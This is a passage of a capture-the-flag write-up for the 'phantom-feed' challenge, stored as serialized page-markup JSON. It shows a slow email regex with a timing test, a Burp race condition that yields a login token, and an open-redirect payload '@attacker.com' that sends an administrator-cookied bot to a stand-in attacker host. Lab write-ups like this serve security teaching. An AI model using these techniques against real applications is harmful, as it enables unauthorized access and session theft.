to_email):\n        email_verified = self.parse_email(to_email)\n[...]\n    def parse_email(self, email):\n        pattern = r\"^([0-9a-zA-Z]([-.\\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\\w]*[0-9a-zA-Z])*\\.)+[a-zA-Z]{2,9})$\"\n\n        try:\n            match = re.match(pattern, email)\n[...]\n",[30653],{"type":33,"tag":105,"props":30654,"children":30655},{"__ignoreMap":8},[30656,30671,30705,30744,30759,30791,30949,30956,30968,31015],{"type":33,"tag":128,"props":30657,"children":30658},{"class":130,"line":131},[30659,30663,30667],{"type":33,"tag":128,"props":30660,"children":30661},{"style":300},[30662],{"type":38,"value":30336},{"type":33,"tag":128,"props":30664,"children":30665},{"style":30339},[30666],{"type":38,"value":29857},{"type":33,"tag":128,"props":30668,"children":30669},{"style":312},[30670],{"type":38,"value":5318},{"type":33,"tag":128,"props":30672,"children":30673},{"class":130,"line":362},[30674,30679,30684,30688,30692,30696,30701],{"type":33,"tag":128,"props":30675,"children":30676},{"style":300},[30677],{"type":38,"value":30678},"    def",{"type":33,"tag":128,"props":30680,"children":30681},{"style":437},[30682],{"type":38,"value":30683}," __init__",{"type":33,"tag":128,"props":30685,"children":30686},{"style":312},[30687],{"type":38,"value":5566},{"type":33,"tag":128,"props":30689,"children":30690},{"style":323},[30691],{"type":38,"value":30091},{"type":33,"tag":128,"props":30693,"children":30694},{"style":312},[30695],{"type":38,"value":5584},{"type":33,"tag":128,"props":30697,"children":30698},{"style":323},[30699],{"type":38,"value":30700}," to_email",{"type":33,"tag":128,"props":30702,"children":30703},{"style":312},[30704],{"type":38,"value":10497},{"type":33,"tag":128,"props":30706,"children":30707},{"class":130,"line":403},[30708,30713,30717,30722,30726,30731,30735,30740],{"type":33,"tag":128,"props":30709,"children":30710},{"style":323},[30711],{"type":38,"value":30712},"        email_verified 
",{"type":33,"tag":128,"props":30714,"children":30715},{"style":312},[30716],{"type":38,"value":315},{"type":33,"tag":128,"props":30718,"children":30719},{"style":151},[30720],{"type":38,"value":30721}," self",{"type":33,"tag":128,"props":30723,"children":30724},{"style":312},[30725],{"type":38,"value":215},{"type":33,"tag":128,"props":30727,"children":30728},{"style":323},[30729],{"type":38,"value":30730},"parse_email",{"type":33,"tag":128,"props":30732,"children":30733},{"style":312},[30734],{"type":38,"value":5566},{"type":33,"tag":128,"props":30736,"children":30737},{"style":323},[30738],{"type":38,"value":30739},"to_email",{"type":33,"tag":128,"props":30741,"children":30742},{"style":312},[30743],{"type":38,"value":2427},{"type":33,"tag":128,"props":30745,"children":30746},{"class":130,"line":739},[30747,30751,30755],{"type":33,"tag":128,"props":30748,"children":30749},{"style":312},[30750],{"type":38,"value":344},{"type":33,"tag":128,"props":30752,"children":30753},{"style":151},[30754],{"type":38,"value":29750},{"type":33,"tag":128,"props":30756,"children":30757},{"style":312},[30758],{"type":38,"value":3262},{"type":33,"tag":128,"props":30760,"children":30761},{"class":130,"line":765},[30762,30766,30771,30775,30779,30783,30787],{"type":33,"tag":128,"props":30763,"children":30764},{"style":300},[30765],{"type":38,"value":30678},{"type":33,"tag":128,"props":30767,"children":30768},{"style":135},[30769],{"type":38,"value":30770}," 
parse_email",{"type":33,"tag":128,"props":30772,"children":30773},{"style":312},[30774],{"type":38,"value":5566},{"type":33,"tag":128,"props":30776,"children":30777},{"style":323},[30778],{"type":38,"value":30091},{"type":33,"tag":128,"props":30780,"children":30781},{"style":312},[30782],{"type":38,"value":5584},{"type":33,"tag":128,"props":30784,"children":30785},{"style":323},[30786],{"type":38,"value":29816},{"type":33,"tag":128,"props":30788,"children":30789},{"style":312},[30790],{"type":38,"value":10497},{"type":33,"tag":128,"props":30792,"children":30793},{"class":130,"line":804},[30794,30799,30803,30808,30812,30817,30821,30826,30830,30835,30840,30844,30848,30852,30856,30860,30864,30868,30872,30876,30880,30884,30889,30893,30897,30901,30905,30909,30913,30919,30923,30927,30932,30937,30941,30945],{"type":33,"tag":128,"props":30795,"children":30796},{"style":323},[30797],{"type":38,"value":30798},"        pattern ",{"type":33,"tag":128,"props":30800,"children":30801},{"style":312},[30802],{"type":38,"value":315},{"type":33,"tag":128,"props":30804,"children":30805},{"style":300},[30806],{"type":38,"value":30807}," 
r",{"type":33,"tag":128,"props":30809,"children":30810},{"style":676},[30811],{"type":38,"value":669},{"type":33,"tag":128,"props":30813,"children":30814},{"style":437},[30815],{"type":38,"value":30816},"^",{"type":33,"tag":128,"props":30818,"children":30819},{"style":312},[30820],{"type":38,"value":5566},{"type":33,"tag":128,"props":30822,"children":30823},{"style":151},[30824],{"type":38,"value":30825},"[0-9a-zA-Z]",{"type":33,"tag":128,"props":30827,"children":30828},{"style":312},[30829],{"type":38,"value":5566},{"type":33,"tag":128,"props":30831,"children":30832},{"style":151},[30833],{"type":38,"value":30834},"[-.",{"type":33,"tag":128,"props":30836,"children":30837},{"style":437},[30838],{"type":38,"value":30839},"\\w",{"type":33,"tag":128,"props":30841,"children":30842},{"style":151},[30843],{"type":38,"value":354},{"type":33,"tag":128,"props":30845,"children":30846},{"style":523},[30847],{"type":38,"value":9683},{"type":33,"tag":128,"props":30849,"children":30850},{"style":151},[30851],{"type":38,"value":30825},{"type":33,"tag":128,"props":30853,"children":30854},{"style":312},[30855],{"type":38,"value":2966},{"type":33,"tag":128,"props":30857,"children":30858},{"style":523},[30859],{"type":38,"value":9683},{"type":33,"tag":128,"props":30861,"children":30862},{"style":16561},[30863],{"type":38,"value":29642},{"type":33,"tag":128,"props":30865,"children":30866},{"style":312},[30867],{"type":38,"value":13071},{"type":33,"tag":128,"props":30869,"children":30870},{"style":151},[30871],{"type":38,"value":30825},{"type":33,"tag":128,"props":30873,"children":30874},{"style":312},[30875],{"type":38,"value":2966},{"type":33,"tag":128,"props":30877,"children":30878},{"style":523},[30879],{"type":38,"value":25605},{"type":33,"tag":128,"props":30881,"children":30882},{"style":312},[30883],{"type":38,"value":5566},{"type":33,"tag":128,"props":30885,"children":30886},{"style":151},[30887],{"type":38,"value":30888},"[-",{"type":33,"tag":128,"props":30890,"children":30891}
,{"style":437},[30892],{"type":38,"value":30839},{"type":33,"tag":128,"props":30894,"children":30895},{"style":151},[30896],{"type":38,"value":354},{"type":33,"tag":128,"props":30898,"children":30899},{"style":523},[30900],{"type":38,"value":9683},{"type":33,"tag":128,"props":30902,"children":30903},{"style":151},[30904],{"type":38,"value":30825},{"type":33,"tag":128,"props":30906,"children":30907},{"style":312},[30908],{"type":38,"value":2966},{"type":33,"tag":128,"props":30910,"children":30911},{"style":523},[30912],{"type":38,"value":9683},{"type":33,"tag":128,"props":30914,"children":30916},{"style":30915},"--shiki-default:#E6CC77",[30917],{"type":38,"value":30918},"\\.",{"type":33,"tag":128,"props":30920,"children":30921},{"style":312},[30922],{"type":38,"value":2966},{"type":33,"tag":128,"props":30924,"children":30925},{"style":523},[30926],{"type":38,"value":25605},{"type":33,"tag":128,"props":30928,"children":30929},{"style":151},[30930],{"type":38,"value":30931},"[a-zA-Z]",{"type":33,"tag":128,"props":30933,"children":30934},{"style":523},[30935],{"type":38,"value":30936},"{2,9}",{"type":33,"tag":128,"props":30938,"children":30939},{"style":312},[30940],{"type":38,"value":2966},{"type":33,"tag":128,"props":30942,"children":30943},{"style":437},[30944],{"type":38,"value":3651},{"type":33,"tag":128,"props":30946,"children":30947},{"style":676},[30948],{"type":38,"value":836},{"type":33,"tag":128,"props":30950,"children":30951},{"class":130,"line":839},[30952],{"type":33,"tag":128,"props":30953,"children":30954},{"emptyLinePlaceholder":896},[30955],{"type":38,"value":899},{"type":33,"tag":128,"props":30957,"children":30958},{"class":130,"line":848},[30959,30964],{"type":33,"tag":128,"props":30960,"children":30961},{"style":1576},[30962],{"type":38,"value":30963},"        
try",{"type":33,"tag":128,"props":30965,"children":30966},{"style":312},[30967],{"type":38,"value":5318},{"type":33,"tag":128,"props":30969,"children":30970},{"class":130,"line":976},[30971,30976,30980,30985,30989,30994,30998,31003,31007,31011],{"type":33,"tag":128,"props":30972,"children":30973},{"style":323},[30974],{"type":38,"value":30975},"            match ",{"type":33,"tag":128,"props":30977,"children":30978},{"style":312},[30979],{"type":38,"value":315},{"type":33,"tag":128,"props":30981,"children":30982},{"style":323},[30983],{"type":38,"value":30984}," re",{"type":33,"tag":128,"props":30986,"children":30987},{"style":312},[30988],{"type":38,"value":215},{"type":33,"tag":128,"props":30990,"children":30991},{"style":323},[30992],{"type":38,"value":30993},"match",{"type":33,"tag":128,"props":30995,"children":30996},{"style":312},[30997],{"type":38,"value":5566},{"type":33,"tag":128,"props":30999,"children":31000},{"style":323},[31001],{"type":38,"value":31002},"pattern",{"type":33,"tag":128,"props":31004,"children":31005},{"style":312},[31006],{"type":38,"value":5584},{"type":33,"tag":128,"props":31008,"children":31009},{"style":323},[31010],{"type":38,"value":29816},{"type":33,"tag":128,"props":31012,"children":31013},{"style":312},[31014],{"type":38,"value":2427},{"type":33,"tag":128,"props":31016,"children":31017},{"class":130,"line":988},[31018,31022,31026],{"type":33,"tag":128,"props":31019,"children":31020},{"style":312},[31021],{"type":38,"value":344},{"type":33,"tag":128,"props":31023,"children":31024},{"style":151},[31025],{"type":38,"value":29750},{"type":33,"tag":128,"props":31027,"children":31028},{"style":312},[31029],{"type":38,"value":3262},{"type":33,"tag":47,"props":31031,"children":31032},{},[31033],{"type":38,"value":31034},"We can therefore try to see if sending a large email would cause the server to hang.",{"type":33,"tag":47,"props":31036,"children":31037},{},[31038],{"type":38,"value":31039},"With a small test script and a 
25-character email, we can see that the function takes more than 2 seconds to execute.",{"type":33,"tag":114,"props":31041,"children":31042},{"lang":10227},[31043],{"type":33,"tag":119,"props":31044,"children":31046},{"className":10231,"code":31045,"language":10227,"meta":8,"style":8},"# test.py\nimport datetime\nimport re\n\npattern = r\"^([0-9a-zA-Z]([-.\\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\\w]*[0-9a-zA-Z])*\\.)+[a-zA-Z]{2,9})$\"\ntime_now = datetime.datetime.now()\nemail = \"a\"*25\nre.match(pattern, email)\ntime_after = datetime.datetime.now()\nprint(time_after - time_now)\n",[31047],{"type":33,"tag":105,"props":31048,"children":31049},{"__ignoreMap":8},[31050,31058,31070,31082,31089,31237,31276,31309,31345,31381],{"type":33,"tag":128,"props":31051,"children":31052},{"class":130,"line":131},[31053],{"type":33,"tag":128,"props":31054,"children":31055},{"style":5541},[31056],{"type":38,"value":31057},"# test.py\n",{"type":33,"tag":128,"props":31059,"children":31060},{"class":130,"line":362},[31061,31065],{"type":33,"tag":128,"props":31062,"children":31063},{"style":1576},[31064],{"type":38,"value":10244},{"type":33,"tag":128,"props":31066,"children":31067},{"style":323},[31068],{"type":38,"value":31069}," datetime\n",{"type":33,"tag":128,"props":31071,"children":31072},{"class":130,"line":403},[31073,31077],{"type":33,"tag":128,"props":31074,"children":31075},{"style":1576},[31076],{"type":38,"value":10244},{"type":33,"tag":128,"props":31078,"children":31079},{"style":323},[31080],{"type":38,"value":31081}," 
re\n",{"type":33,"tag":128,"props":31083,"children":31084},{"class":130,"line":739},[31085],{"type":33,"tag":128,"props":31086,"children":31087},{"emptyLinePlaceholder":896},[31088],{"type":38,"value":899},{"type":33,"tag":128,"props":31090,"children":31091},{"class":130,"line":765},[31092,31097,31101,31105,31109,31113,31117,31121,31125,31129,31133,31137,31141,31145,31149,31153,31157,31161,31165,31169,31173,31177,31181,31185,31189,31193,31197,31201,31205,31209,31213,31217,31221,31225,31229,31233],{"type":33,"tag":128,"props":31093,"children":31094},{"style":323},[31095],{"type":38,"value":31096},"pattern ",{"type":33,"tag":128,"props":31098,"children":31099},{"style":312},[31100],{"type":38,"value":315},{"type":33,"tag":128,"props":31102,"children":31103},{"style":300},[31104],{"type":38,"value":30807},{"type":33,"tag":128,"props":31106,"children":31107},{"style":676},[31108],{"type":38,"value":669},{"type":33,"tag":128,"props":31110,"children":31111},{"style":437},[31112],{"type":38,"value":30816},{"type":33,"tag":128,"props":31114,"children":31115},{"style":312},[31116],{"type":38,"value":5566},{"type":33,"tag":128,"props":31118,"children":31119},{"style":151},[31120],{"type":38,"value":30825},{"type":33,"tag":128,"props":31122,"children":31123},{"style":312},[31124],{"type":38,"value":5566},{"type":33,"tag":128,"props":31126,"children":31127},{"style":151},[31128],{"type":38,"value":30834},{"type":33,"tag":128,"props":31130,"children":31131},{"style":437},[31132],{"type":38,"value":30839},{"type":33,"tag":128,"props":31134,"children":31135},{"style":151},[31136],{"type":38,"value":354},{"type":33,"tag":128,"props":31138,"children":31139},{"style":523},[31140],{"type":38,"value":9683},{"type":33,"tag":128,"props":31142,"children":31143},{"style":151},[31144],{"type":38,"value":30825},{"type":33,"tag":128,"props":31146,"children":31147},{"style":312},[31148],{"type":38,"value":2966},{"type":33,"tag":128,"props":31150,"children":31151},{"style":523},[31152],{"type":
38,"value":9683},{"type":33,"tag":128,"props":31154,"children":31155},{"style":16561},[31156],{"type":38,"value":29642},{"type":33,"tag":128,"props":31158,"children":31159},{"style":312},[31160],{"type":38,"value":13071},{"type":33,"tag":128,"props":31162,"children":31163},{"style":151},[31164],{"type":38,"value":30825},{"type":33,"tag":128,"props":31166,"children":31167},{"style":312},[31168],{"type":38,"value":2966},{"type":33,"tag":128,"props":31170,"children":31171},{"style":523},[31172],{"type":38,"value":25605},{"type":33,"tag":128,"props":31174,"children":31175},{"style":312},[31176],{"type":38,"value":5566},{"type":33,"tag":128,"props":31178,"children":31179},{"style":151},[31180],{"type":38,"value":30888},{"type":33,"tag":128,"props":31182,"children":31183},{"style":437},[31184],{"type":38,"value":30839},{"type":33,"tag":128,"props":31186,"children":31187},{"style":151},[31188],{"type":38,"value":354},{"type":33,"tag":128,"props":31190,"children":31191},{"style":523},[31192],{"type":38,"value":9683},{"type":33,"tag":128,"props":31194,"children":31195},{"style":151},[31196],{"type":38,"value":30825},{"type":33,"tag":128,"props":31198,"children":31199},{"style":312},[31200],{"type":38,"value":2966},{"type":33,"tag":128,"props":31202,"children":31203},{"style":523},[31204],{"type":38,"value":9683},{"type":33,"tag":128,"props":31206,"children":31207},{"style":30915},[31208],{"type":38,"value":30918},{"type":33,"tag":128,"props":31210,"children":31211},{"style":312},[31212],{"type":38,"value":2966},{"type":33,"tag":128,"props":31214,"children":31215},{"style":523},[31216],{"type":38,"value":25605},{"type":33,"tag":128,"props":31218,"children":31219},{"style":151},[31220],{"type":38,"value":30931},{"type":33,"tag":128,"props":31222,"children":31223},{"style":523},[31224],{"type":38,"value":30936},{"type":33,"tag":128,"props":31226,"children":31227},{"style":312},[31228],{"type":38,"value":2966},{"type":33,"tag":128,"props":31230,"children":31231},{"style":437},[3
1232],{"type":38,"value":3651},{"type":33,"tag":128,"props":31234,"children":31235},{"style":676},[31236],{"type":38,"value":836},{"type":33,"tag":128,"props":31238,"children":31239},{"class":130,"line":804},[31240,31245,31249,31254,31258,31263,31267,31272],{"type":33,"tag":128,"props":31241,"children":31242},{"style":323},[31243],{"type":38,"value":31244},"time_now ",{"type":33,"tag":128,"props":31246,"children":31247},{"style":312},[31248],{"type":38,"value":315},{"type":33,"tag":128,"props":31250,"children":31251},{"style":323},[31252],{"type":38,"value":31253}," datetime",{"type":33,"tag":128,"props":31255,"children":31256},{"style":312},[31257],{"type":38,"value":215},{"type":33,"tag":128,"props":31259,"children":31260},{"style":323},[31261],{"type":38,"value":31262},"datetime",{"type":33,"tag":128,"props":31264,"children":31265},{"style":312},[31266],{"type":38,"value":215},{"type":33,"tag":128,"props":31268,"children":31269},{"style":323},[31270],{"type":38,"value":31271},"now",{"type":33,"tag":128,"props":31273,"children":31274},{"style":312},[31275],{"type":38,"value":7857},{"type":33,"tag":128,"props":31277,"children":31278},{"class":130,"line":839},[31279,31284,31288,31292,31296,31300,31304],{"type":33,"tag":128,"props":31280,"children":31281},{"style":323},[31282],{"type":38,"value":31283},"email 
",{"type":33,"tag":128,"props":31285,"children":31286},{"style":312},[31287],{"type":38,"value":315},{"type":33,"tag":128,"props":31289,"children":31290},{"style":676},[31291],{"type":38,"value":679},{"type":33,"tag":128,"props":31293,"children":31294},{"style":140},[31295],{"type":38,"value":53},{"type":33,"tag":128,"props":31297,"children":31298},{"style":676},[31299],{"type":38,"value":669},{"type":33,"tag":128,"props":31301,"children":31302},{"style":300},[31303],{"type":38,"value":9683},{"type":33,"tag":128,"props":31305,"children":31306},{"style":523},[31307],{"type":38,"value":31308},"25\n",{"type":33,"tag":128,"props":31310,"children":31311},{"class":130,"line":848},[31312,31317,31321,31325,31329,31333,31337,31341],{"type":33,"tag":128,"props":31313,"children":31314},{"style":323},[31315],{"type":38,"value":31316},"re",{"type":33,"tag":128,"props":31318,"children":31319},{"style":312},[31320],{"type":38,"value":215},{"type":33,"tag":128,"props":31322,"children":31323},{"style":323},[31324],{"type":38,"value":30993},{"type":33,"tag":128,"props":31326,"children":31327},{"style":312},[31328],{"type":38,"value":5566},{"type":33,"tag":128,"props":31330,"children":31331},{"style":323},[31332],{"type":38,"value":31002},{"type":33,"tag":128,"props":31334,"children":31335},{"style":312},[31336],{"type":38,"value":5584},{"type":33,"tag":128,"props":31338,"children":31339},{"style":323},[31340],{"type":38,"value":29816},{"type":33,"tag":128,"props":31342,"children":31343},{"style":312},[31344],{"type":38,"value":2427},{"type":33,"tag":128,"props":31346,"children":31347},{"class":130,"line":976},[31348,31353,31357,31361,31365,31369,31373,31377],{"type":33,"tag":128,"props":31349,"children":31350},{"style":323},[31351],{"type":38,"value":31352},"time_after 
",{"type":33,"tag":128,"props":31354,"children":31355},{"style":312},[31356],{"type":38,"value":315},{"type":33,"tag":128,"props":31358,"children":31359},{"style":323},[31360],{"type":38,"value":31253},{"type":33,"tag":128,"props":31362,"children":31363},{"style":312},[31364],{"type":38,"value":215},{"type":33,"tag":128,"props":31366,"children":31367},{"style":323},[31368],{"type":38,"value":31262},{"type":33,"tag":128,"props":31370,"children":31371},{"style":312},[31372],{"type":38,"value":215},{"type":33,"tag":128,"props":31374,"children":31375},{"style":323},[31376],{"type":38,"value":31271},{"type":33,"tag":128,"props":31378,"children":31379},{"style":312},[31380],{"type":38,"value":7857},{"type":33,"tag":128,"props":31382,"children":31383},{"class":130,"line":988},[31384,31389,31393,31397,31401,31406],{"type":33,"tag":128,"props":31385,"children":31386},{"style":437},[31387],{"type":38,"value":31388},"print",{"type":33,"tag":128,"props":31390,"children":31391},{"style":312},[31392],{"type":38,"value":5566},{"type":33,"tag":128,"props":31394,"children":31395},{"style":323},[31396],{"type":38,"value":31352},{"type":33,"tag":128,"props":31398,"children":31399},{"style":300},[31400],{"type":38,"value":907},{"type":33,"tag":128,"props":31402,"children":31403},{"style":323},[31404],{"type":38,"value":31405}," time_now",{"type":33,"tag":128,"props":31407,"children":31408},{"style":312},[31409],{"type":38,"value":2427},{"type":33,"tag":47,"props":31411,"children":31412},{},[31413],{"type":38,"value":31414},"You can find below the result of the execution of the script:",{"type":33,"tag":75,"props":31416,"children":31418},{"imgSrc":31417,":width":12028},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704226431/writeups/phantom-feed/test_regex.webp",[],{"type":33,"tag":47,"props":31420,"children":31421},{},[31422],{"type":38,"value":31423},"So, we can confirm that if we register a user with an email that is 25 characters long and then try to log in, we will have a 
valid token. This is because the boolean will still be True at the time of login.",{"type":33,"tag":47,"props":31425,"children":31426},{},[31427],{"type":38,"value":31428},"With Burp, a race condition like this is easy to exploit: just select the \"Send group (separate connections)\" option.",{"type":33,"tag":75,"props":31430,"children":31432},{"imgSrc":31431},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704325504/writeups/phantom-feed/burp_race_condition.webp",[],{"type":33,"tag":47,"props":31434,"children":31435},{},[31436],{"type":38,"value":31437},"After that, we can see that during the login, the application sent us a JWT token. This token allows us to access routes protected by a middleware, which we will see in the next section.",{"type":33,"tag":75,"props":31439,"children":31441},{"imgSrc":31440},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704311577/writeups/phantom-feed/burp_login_token.webp",[],{"type":33,"tag":40,"props":31443,"children":31445},{"id":31444},"open-redirect",[31446],{"type":38,"value":31447},"Open Redirect",{"type":33,"tag":47,"props":31449,"children":31450},{},[31451],{"type":38,"value":31452},"Now that we have a valid user token, we can call the route that invokes the bot.",{"type":33,"tag":47,"props":31454,"children":31455},{},[31456,31458,31464,31466,31472],{"type":38,"value":31457},"When examining the bot's declaration, it becomes apparent that the \"link\" parameter, which we control, is used insecurely and is susceptible to open redirection.\nIf we submit a payload like ",{"type":33,"tag":105,"props":31459,"children":31461},{"className":31460},[],[31462],{"type":38,"value":31463},"@attacker.com",{"type":38,"value":31465}," the bot will be redirected to 
",{"type":33,"tag":105,"props":31467,"children":31469},{"className":31468},[],[31470],{"type":38,"value":31471},"attacker.com",{"type":38,"value":215},{"type":33,"tag":114,"props":31474,"children":31475},{"lang":10227},[31476],{"type":33,"tag":119,"props":31477,"children":31479},{"className":10231,"code":31478,"language":10227,"meta":8,"style":8},"def bot_runner(link):\n    chrome_options = Options()\n [...]\n    client = webdriver.Chrome(options=chrome_options)\n    client.get(\"http://127.0.0.1:5000\")\n\n    token = create_jwt(1, \"administrator\")\n    cookie = {\n        \"name\": \"token\",\n        \"value\": token,\n        \"domain\": \"127.0.0.1\",\n        \"path\": \"/\",\n        \"expiry\": int((datetime.datetime.now() + datetime.timedelta(seconds=1800)).timestamp()),\n        \"secure\": False,\n        \"httpOnly\": True\n    }\n    client.add_cookie(cookie)\n\n    client.get(\"http://127.0.0.1:5000\" + link) # \u003C--- Here is the open redirect\n    time.sleep(10)\n    client.quit()\n",[31480],{"type":33,"tag":105,"props":31481,"children":31482},{"__ignoreMap":8},[31483,31508,31529,31544,31592,31629,31636,31682,31698,31734,31762,31799,31835,31938,31966,31991,31998,32027,32034,32083,32113],{"type":33,"tag":128,"props":31484,"children":31485},{"class":130,"line":131},[31486,31490,31495,31499,31504],{"type":33,"tag":128,"props":31487,"children":31488},{"style":300},[31489],{"type":38,"value":10402},{"type":33,"tag":128,"props":31491,"children":31492},{"style":135},[31493],{"type":38,"value":31494}," 
bot_runner",{"type":33,"tag":128,"props":31496,"children":31497},{"style":312},[31498],{"type":38,"value":5566},{"type":33,"tag":128,"props":31500,"children":31501},{"style":323},[31502],{"type":38,"value":31503},"link",{"type":33,"tag":128,"props":31505,"children":31506},{"style":312},[31507],{"type":38,"value":10497},{"type":33,"tag":128,"props":31509,"children":31510},{"class":130,"line":362},[31511,31516,31520,31525],{"type":33,"tag":128,"props":31512,"children":31513},{"style":323},[31514],{"type":38,"value":31515},"    chrome_options ",{"type":33,"tag":128,"props":31517,"children":31518},{"style":312},[31519],{"type":38,"value":315},{"type":33,"tag":128,"props":31521,"children":31522},{"style":323},[31523],{"type":38,"value":31524}," Options",{"type":33,"tag":128,"props":31526,"children":31527},{"style":312},[31528],{"type":38,"value":7857},{"type":33,"tag":128,"props":31530,"children":31531},{"class":130,"line":403},[31532,31536,31540],{"type":33,"tag":128,"props":31533,"children":31534},{"style":312},[31535],{"type":38,"value":718},{"type":33,"tag":128,"props":31537,"children":31538},{"style":151},[31539],{"type":38,"value":29750},{"type":33,"tag":128,"props":31541,"children":31542},{"style":312},[31543],{"type":38,"value":3262},{"type":33,"tag":128,"props":31545,"children":31546},{"class":130,"line":739},[31547,31552,31556,31561,31565,31570,31574,31579,31583,31588],{"type":33,"tag":128,"props":31548,"children":31549},{"style":323},[31550],{"type":38,"value":31551},"    client ",{"type":33,"tag":128,"props":31553,"children":31554},{"style":312},[31555],{"type":38,"value":315},{"type":33,"tag":128,"props":31557,"children":31558},{"style":323},[31559],{"type":38,"value":31560}," 
webdriver",{"type":33,"tag":128,"props":31562,"children":31563},{"style":312},[31564],{"type":38,"value":215},{"type":33,"tag":128,"props":31566,"children":31567},{"style":323},[31568],{"type":38,"value":31569},"Chrome",{"type":33,"tag":128,"props":31571,"children":31572},{"style":312},[31573],{"type":38,"value":5566},{"type":33,"tag":128,"props":31575,"children":31576},{"style":306},[31577],{"type":38,"value":31578},"options",{"type":33,"tag":128,"props":31580,"children":31581},{"style":312},[31582],{"type":38,"value":315},{"type":33,"tag":128,"props":31584,"children":31585},{"style":323},[31586],{"type":38,"value":31587},"chrome_options",{"type":33,"tag":128,"props":31589,"children":31590},{"style":312},[31591],{"type":38,"value":2427},{"type":33,"tag":128,"props":31593,"children":31594},{"class":130,"line":765},[31595,31600,31604,31608,31612,31616,31621,31625],{"type":33,"tag":128,"props":31596,"children":31597},{"style":323},[31598],{"type":38,"value":31599},"    client",{"type":33,"tag":128,"props":31601,"children":31602},{"style":312},[31603],{"type":38,"value":215},{"type":33,"tag":128,"props":31605,"children":31606},{"style":323},[31607],{"type":38,"value":13526},{"type":33,"tag":128,"props":31609,"children":31610},{"style":312},[31611],{"type":38,"value":5566},{"type":33,"tag":128,"props":31613,"children":31614},{"style":676},[31615],{"type":38,"value":669},{"type":33,"tag":128,"props":31617,"children":31618},{"style":140},[31619],{"type":38,"value":31620},"http://127.0.0.1:5000",{"type":33,"tag":128,"props":31622,"children":31623},{"style":676},[31624],{"type":38,"value":669},{"type":33,"tag":128,"props":31626,"children":31627},{"style":312},[31628],{"type":38,"value":2427},{"type":33,"tag":128,"props":31630,"children":31631},{"class":130,"line":804},[31632],{"type":33,"tag":128,"props":31633,"children":31634},{"emptyLinePlaceholder":896},[31635],{"type":38,"value":899},{"type":33,"tag":128,"props":31637,"children":31638},{"class":130,"line":839},[31639,31
644,31648,31653,31657,31661,31665,31669,31674,31678],{"type":33,"tag":128,"props":31640,"children":31641},{"style":323},[31642],{"type":38,"value":31643},"    token ",{"type":33,"tag":128,"props":31645,"children":31646},{"style":312},[31647],{"type":38,"value":315},{"type":33,"tag":128,"props":31649,"children":31650},{"style":323},[31651],{"type":38,"value":31652}," create_jwt",{"type":33,"tag":128,"props":31654,"children":31655},{"style":312},[31656],{"type":38,"value":5566},{"type":33,"tag":128,"props":31658,"children":31659},{"style":523},[31660],{"type":38,"value":7284},{"type":33,"tag":128,"props":31662,"children":31663},{"style":312},[31664],{"type":38,"value":5584},{"type":33,"tag":128,"props":31666,"children":31667},{"style":676},[31668],{"type":38,"value":679},{"type":33,"tag":128,"props":31670,"children":31671},{"style":140},[31672],{"type":38,"value":31673},"administrator",{"type":33,"tag":128,"props":31675,"children":31676},{"style":676},[31677],{"type":38,"value":669},{"type":33,"tag":128,"props":31679,"children":31680},{"style":312},[31681],{"type":38,"value":2427},{"type":33,"tag":128,"props":31683,"children":31684},{"class":130,"line":848},[31685,31690,31694],{"type":33,"tag":128,"props":31686,"children":31687},{"style":323},[31688],{"type":38,"value":31689},"    cookie 
",{"type":33,"tag":128,"props":31691,"children":31692},{"style":312},[31693],{"type":38,"value":315},{"type":33,"tag":128,"props":31695,"children":31696},{"style":312},[31697],{"type":38,"value":762},{"type":33,"tag":128,"props":31699,"children":31700},{"class":130,"line":976},[31701,31705,31709,31713,31717,31721,31726,31730],{"type":33,"tag":128,"props":31702,"children":31703},{"style":676},[31704],{"type":38,"value":12732},{"type":33,"tag":128,"props":31706,"children":31707},{"style":140},[31708],{"type":38,"value":12126},{"type":33,"tag":128,"props":31710,"children":31711},{"style":676},[31712],{"type":38,"value":669},{"type":33,"tag":128,"props":31714,"children":31715},{"style":312},[31716],{"type":38,"value":284},{"type":33,"tag":128,"props":31718,"children":31719},{"style":676},[31720],{"type":38,"value":679},{"type":33,"tag":128,"props":31722,"children":31723},{"style":140},[31724],{"type":38,"value":31725},"token",{"type":33,"tag":128,"props":31727,"children":31728},{"style":676},[31729],{"type":38,"value":669},{"type":33,"tag":128,"props":31731,"children":31732},{"style":312},[31733],{"type":38,"value":693},{"type":33,"tag":128,"props":31735,"children":31736},{"class":130,"line":988},[31737,31741,31745,31749,31753,31758],{"type":33,"tag":128,"props":31738,"children":31739},{"style":676},[31740],{"type":38,"value":12732},{"type":33,"tag":128,"props":31742,"children":31743},{"style":140},[31744],{"type":38,"value":14160},{"type":33,"tag":128,"props":31746,"children":31747},{"style":676},[31748],{"type":38,"value":669},{"type":33,"tag":128,"props":31750,"children":31751},{"style":312},[31752],{"type":38,"value":284},{"type":33,"tag":128,"props":31754,"children":31755},{"style":323},[31756],{"type":38,"value":31757}," 
token",{"type":33,"tag":128,"props":31759,"children":31760},{"style":312},[31761],{"type":38,"value":693},{"type":33,"tag":128,"props":31763,"children":31764},{"class":130,"line":1001},[31765,31769,31774,31778,31782,31786,31791,31795],{"type":33,"tag":128,"props":31766,"children":31767},{"style":676},[31768],{"type":38,"value":12732},{"type":33,"tag":128,"props":31770,"children":31771},{"style":140},[31772],{"type":38,"value":31773},"domain",{"type":33,"tag":128,"props":31775,"children":31776},{"style":676},[31777],{"type":38,"value":669},{"type":33,"tag":128,"props":31779,"children":31780},{"style":312},[31781],{"type":38,"value":284},{"type":33,"tag":128,"props":31783,"children":31784},{"style":676},[31785],{"type":38,"value":679},{"type":33,"tag":128,"props":31787,"children":31788},{"style":140},[31789],{"type":38,"value":31790},"127.0.0.1",{"type":33,"tag":128,"props":31792,"children":31793},{"style":676},[31794],{"type":38,"value":669},{"type":33,"tag":128,"props":31796,"children":31797},{"style":312},[31798],{"type":38,"value":693},{"type":33,"tag":128,"props":31800,"children":31801},{"class":130,"line":1014},[31802,31806,31811,31815,31819,31823,31827,31831],{"type":33,"tag":128,"props":31803,"children":31804},{"style":676},[31805],{"type":38,"value":12732},{"type":33,"tag":128,"props":31807,"children":31808},{"style":140},[31809],{"type":38,"value":31810},"path",{"type":33,"tag":128,"props":31812,"children":31813},{"style":676},[31814],{"type":38,"value":669},{"type":33,"tag":128,"props":31816,"children":31817},{"style":312},[31818],{"type":38,"value":284},{"type":33,"tag":128,"props":31820,"children":31821},{"s